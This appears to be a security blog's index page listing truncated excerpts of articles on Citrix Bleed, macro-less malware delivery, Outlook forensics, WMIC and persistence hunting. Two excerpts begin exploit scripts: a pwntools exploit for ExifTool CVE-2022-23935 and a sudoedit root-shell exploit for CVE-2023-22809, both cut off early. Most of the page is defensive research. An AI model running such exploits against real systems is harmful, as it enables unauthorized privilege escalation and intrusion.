Detecting Ransomware Threats: StopRansomware – LockBit 3.0 Exploits CVE-2023-4966 in Citrix Bleed Vulnerability
Hello to all of you. 🙂 Introduction: The recently discovered Citrix Bleed vulnerability (CVE-2023-4966) poses a serious threat to computer security. Stemming from a security flaw in Citrix products, this vulnerability has the potential to allow malicious actors to infiltrate systems and gain access to sensitive information. Vulnerability Description: Citrix Bleed points to a specific security vulnerability in Citrix products. This flaw, by permitting unauthorized access, enables attackers to breach systems and access user data. Exploiting this vulnerability, adversaries can infiltrate corporate networks and compromise confidential information. CVE-2023-4966 Details: The Citrix Bleed vulnerability is identified by the CVE-2023-4966 number. Originating from a code weakness in specific Citrix products, Citrix recommends users promptly address this issue by applying security patches. Affected Products/Versions: The Citrix Bleed vulnerability impacts specific Citrix products. The following versions of NetScaler ADC and Gateway devices are affected by this security flaw: NetScaler ADC and NetScaler Gateway 14.1-pre-14.1-8.50…
Makro Sonrası Döneme Uyum Sağlayan Tehdit Aktörlerin Yöntemleri
Hepinize selamlar, ben Mehmet Kadir CIRIK. Microsoft, Ekim 2021’de Office kullanıcıları için XL4 ve VBA makroları varsayılan olarak engellemeye başlayacağını, sırasıyla Şubat 2022’de başlatacağını duyurmuştu. Bu değişiklikler 2022 yılında etkinleştirilmeye başlandı. 2022 Temmuz ayında VBA makro engelleme uygulamasıyla ilgili bazı karmaşa yaşandı, ancak Microsoft bunun devam edeceğini duyurdu. Tehdit aktörleri, bu değişikliklere tepki olarak makro temelli tehditlerden uzaklaşmaya başladı. Araştırmacılar bu açıklamadan sonra Ekim 2021‘den bu yana kadar olan kampanya verilerine göre, tehdit aktörleri, kötü amaçlı yazılımı iletmek için doğrudan mesajlara eklenen makro etkinleştirilmiş belgelerden uzaklaştı ve giderek daha fazla ISO ve RAR ekleri ile Windows Kısayolu (LNK) dosyaları kullandı. Bir çok rapordan çıkardığım sonuçlara göre tehdit araştırmacıları tarafından manuel olarak analiz edilen ve içerikleri bağlamsallaştırılan kampanya tehditlerinin analizine göre, tehdit aktörlerinin makro etkinleştirilmiş eklerini kullanma oranı oldukça azaldı. Tehdit aktörleri, kullanıcılar Office uygulamalarında makroları etkinleştirdiğinde kötü niyetli içeriği otomatik olarak çalıştırmak için VBA makrolarını kullanır. XL4 makroları Excel uygulamasına…
Microsoft Outlook Forensic Analysis
Techniques and Tools for Detecting Malicious Activities Microsoft Outlook is a popular email client used by millions of people worldwide. However, it has also become a common target for attackers seeking to gain access to target systems and steal sensitive data. In this article, we will explore the various techniques and tools available for forensic investigators to analyze Outlook logs, identify malicious activities, and investigate related phishing attacks. Outlook forensic analysis tools are software programs used by forensic investigators to analyze Outlook logs and detect malicious activities. These tools can help investigators identify and investigate security breaches, phishing attacks, and other malicious activities related to the use of Microsoft Outlook. Some of the most commonly used Outlook forensic analysis tools include: Message Header Analyzer – a free online tool provided by Microsoft that can extract and display information from email headers, such as IP addresses and domain names. Outlook Rules…
CVE-2022-23935 Exploit
This vulnerability causes command injection by mismanaging a $file =~ /\|$/ check in lib/Image/ExifTool.pm in ExifTool prior to 12.38. #!/usr/bin/python3 from pwn import * import base64 import sys class ExploitExiftools: def __init__(self,ip,port): self.ip = ip self.port = port self.p = log.progress(“”) def printBanner(self): print(“”” _____ __ __ ______ ___ ___ ___ ___ ___ ____ ___ ____ _____ / ____|\ \ / /| ____| |__ \ / _ \|__ \ |__ \ |__ \ |___ \ / _ \|___ \ | ____| | | \ \ / / | |__ ______ ) || | | | ) | ) |______ ) | __) || (_) | __) || |__ | | \ \/ / | __||______|/ / | | | | / / / /|______|/ / |__ < \__, ||__ < |___ \ | |____ \ / | |____ / /_ | |_| |/ /_ / /_ / /_ ___) |…
CVE-2023-22809 – sudo 1.8.0 – 1.9.12p1 – Privilege Escalation
#!/usr/bin/env bash # # Exploit Title: sudo 1.8.0 – 1.9.12p1 – Privilege Escalation # # CVE: CVE-2023-22809 # Vendor Homepage: https://www.sudo.ws/ # Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz # Version: 1.8.0 to 1.9.12p1 # Tested on: Ubuntu Server 22.04 – vim 8.2.4919 – sudo 1.9.9 # # Running this exploit on a vulnerable system allows a localiattacker to gain # a root shell on the machine. # # The exploit checks if the current user has privileges to run sudoedit or # sudo -e on a file as root. If so it will open the sudoers file for the # attacker to add a line to gain privileges on all the files and get a root # shell. EXPLOITABLE=$(sudo -l | grep -E “sudoedit|sudo -e” | grep -E “(root)” | cut -d ‘ ‘ -f 6-) if [ -z “$EXPLOITABLE” ]; then echo “> This user can’t run sudoedit as root” else echo…
WMIC-WMI for Incident Response and Threat Hunting
Hepinize selamlar, bu makalemde sizlere Olay Müdahale, Threat Hunting ve saldırıları tespit etme süreçlerinde önemli bir yeri olan WMI ve WMIC nedir, burada kullanılan komutlardan ve görevlerinden bahsedeceğim. Umarım faydalı olur, şimdiden iyi okumalar. 🙂 İlk olarak şu 2 önemli terimi açıklayalım; WMIC = Windows Management Instrumentation Command-line – Windows Yönetim Araçları Komut Satırı WMI = Windows Management Instrumentation (WMI) – Windows Yönetim Araçları Windows Yönetim Araçları Komut Satırı (WMIC) , kullanıcıların bir komut istemiyle Windows Yönetim Araçları (WMI) işlemlerini gerçekleştirmesine olanak tanıyan bir yazılım yardımcı programıdır. WMI Windows Yönetim Araçları (WMI), sistem yöneticilerine sistem izleme araçlarına erişim sağlayan bir PowerShell alt sistemidir. Bu sistem, hızlı ve verimli bir şekilde sistem yönetimine izin verecek şekilde tasarlanmıştır. Genel olarak yöneticiler sistemler üzerinde WMI’yı kullanarak şu işlemleri yaparlar. sistemleri yapılandırma, işlemleri veya komut dosyalarını yürütme, görevleri otomatikleştirme… Ancak normalde WMI bu işlemleri gerçekleştirmek için tasarlanmış olsa da, saldırganlar ve hacker grupları tarafından…
Hunting for Persistence: Registry Run Keys / Startup Folder
Hepinize selamlar, bu makalemde sizlere saldırganların hedef sistemlerde kalıcılık sağlamak için kullandıkları, MITRE ATT&CK matrisinde T1547.001 ATT&CK ID’sine karşılık gelen Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder tekniğini anlatmaya çalışacağım. Saldırganlar sistemlerde ilk erişimlerini sağladıktan sonra, sistemler üzerine erişimlerini devam ettirebilmek için kendilerini koruma altına almak isterler. Kısacası sistemler üzerinde kalıcılıklarını devam ettirmeyi amaçlarlar. Persistence (kalıcılık) Kalıcılık, saldırgan kişi ya da grupların hedef sistemlere initial access (ilk erişim) sağladıktan sonra erişimlerinin kesintiye uğramasını engellemek için kullandıkları yöntemler olarak adlandırılmaktadır. Hedef sistemlerde persistence(kalıcılık) sağlamak için kullanılan yöntemleri araştırdığınız zaman çok fazla teknik olduğunu göreceksiniz. Bunun için MITRE ATT&CK sayfasını ziyaret ederek detaylı araştırmalar yapabilirsiniz. Registry Run Keys / Startup Folder Registry ve Startup Folder, saldırganlar tarafından kalıcılık sağlanmak için kullanılan eski ama en etkili yöntemlerden biridir. Run Key’lere yeni bir giriş eklemek veya Startup Folder içeriğine bir kısayol oluşturmak kullanıcı oturum açtığında kötü amaçlı kodlarımızı çalıştırmamız…
Behavior Analysis: Task Scheduler
Hello everyone, in this article I will give you information about the Task Scheduler, which was created to ensure persistence on Windows Systems. Let’s start. 🙂 Scheduled Tasks are available on all Windows operating systems. It is simple to use and most users are not aware of the existence of scheduled tasks. Therefore, it is a very good weapon for attackers. Most people working in this field do not know which applications are normal or abnormal when loading operating systems. Task Scheduled Scheduled tasks keep a task or job running periodically. Or a command to be executed when certain events occur are program files. For example; “Run every time the computer boots up.” or “Run at 8:00 every Monday. Users such as system administrators use scheduled tasks to automatically create and run tasks. Ensuring persistence in the target system is the most important goal of the enemies. If the attackers…